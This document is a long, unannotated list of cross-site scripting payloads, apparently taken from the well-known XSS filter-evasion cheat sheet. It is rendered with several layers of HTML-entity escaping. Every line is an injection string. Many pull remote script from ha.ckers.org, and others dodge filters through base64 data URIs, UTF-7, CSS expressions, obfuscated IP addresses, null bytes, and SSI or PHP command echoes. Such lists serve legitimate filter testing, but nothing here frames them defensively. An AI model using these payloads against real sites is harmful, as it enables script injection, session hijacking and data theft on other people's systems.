&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
